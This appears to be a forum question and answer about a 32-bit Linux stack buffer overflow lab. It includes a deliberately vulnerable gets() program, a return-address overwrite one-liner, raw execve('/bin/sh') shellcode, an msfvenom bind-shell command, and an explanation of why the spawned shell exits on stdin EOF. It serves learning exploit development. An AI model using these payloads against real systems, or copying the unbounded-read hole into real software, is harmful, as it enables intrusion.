Exploit Development - GETS and Shellcode

Trying to learn more about exploit dev and building shellcodes, but ran into an issue I don't understand the reason behind.

Why am I not able to run a shellcode such as execve("/bin/sh") and spawn a shell I can interact with? While on the other hand, I'm able to create a reverse / bind_tcp shell and connect to it with netcat.

Sample program:

// gcc vuln.c -o vuln -m32 -fno-stack-protector -z execstack

#include <stdio.h>
#include <string.h>

void test() {
    char pass[50];
    printf("Password: ");
    gets(pass);  // unbounded read into a 50-byte buffer: the overflow the exploit relies on
    if (strcmp(pass, "epicpassw0rd") == 0) {
        printf("Woho, you got it!\n");
    }
}

int main() {
    __asm__("movl $0xe4ffd4ff, %edx");  // jmp esp, call esp - POC
    test();
    return 0;
}

Sample Exploit:

python -c "print 'A'*62 + '\x35\x56\x55\x56' + 'PAYLOAD'" | ./vuln

Sample Payload (working):

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 LHOST="" -f python

Tested multiple different execve("/bin/sh") samples, as well as creating my own, then compiled them to verify they work before using them as the payload.

Such as:


  • When the shellcode execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate.

    The solution is to close the stdin descriptor and reopen /dev/tty before executing /bin/sh.

    #include <unistd.h>
    #include <stdio.h>
    #include <sys/fcntl.h>
    int main(void) {
        char buf[50];
        gets(buf);                             // once this line is consumed, the pipe on fd 0 is at EOF
        printf("Yo %s\n", buf);
        close(0);                              // drop the drained pipe ...
        open("/dev/tty", O_RDWR | O_NOCTTY);   // ... so the terminal becomes the new fd 0
        execve ("/bin/sh", NULL, NULL);
        return 1;
    }

    Related answer: execve("/bin/sh", 0, 0); in a pipe

    It is also possible to execute the payload by using

    ( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln
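As an added illustration (not code from the question or the answer above), the following C program reproduces the failure mode the answer describes and the condition the `( ...; cat )` trick restores: a shell whose fd 0 is a pipe with no remaining writer reads EOF and exits at once, while a pipe that still has a writer supplying input keeps it alive. It assumes /bin/sh is available and uses the shell's `read` builtin as a stand-in for an interactive command; the input lines are constructed.

```c
#include <fcntl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Start /bin/sh with fd 0 taken from stdin_fd and ask it to read one line.
 * Exit status 0 means the shell got a line; 7 means it hit EOF at once,
 * which is exactly what the question's execve("/bin/sh") payload sees. */
static int run_shell_with_stdin(int stdin_fd) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        dup2(stdin_fd, 0);
        execl("/bin/sh", "sh", "-c", "read line && exit 0; exit 7", (char *)0);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Case 1, `python -c ... | ./vuln`: the writer sends the overflow line and
 * exits, so once gets() has consumed the line the pipe has no writers left
 * and the shell reads EOF immediately. */
int shell_after_drained_pipe(void) {
    int p[2]; char line[64];
    if (pipe(p) < 0)
        return -1;
    (void)write(p[1], "AAAA\n", 5);       /* constructed stand-in for the exploit line */
    close(p[1]);                          /* python has exited */
    (void)read(p[0], line, sizeof line);  /* what gets() in vuln consumed */
    int rc = run_shell_with_stdin(p[0]);
    close(p[0]);
    return rc;                            /* 7 */
}

/* Case 2, `( python -c ...; cat ) | ./vuln`: cat keeps the write end open
 * and forwards whatever is typed, so the shell finds real input on fd 0. */
int shell_with_live_pipe(void) {
    int p[2]; char line[64];
    if (pipe(p) < 0)
        return -1;
    (void)write(p[1], "AAAA\n", 5);
    (void)read(p[0], line, sizeof line);
    (void)write(p[1], "id\n", 3);         /* what the user would type into cat */
    int rc = run_shell_with_stdin(p[0]);
    close(p[1]); close(p[0]);
    return rc;                            /* 0 */
}
```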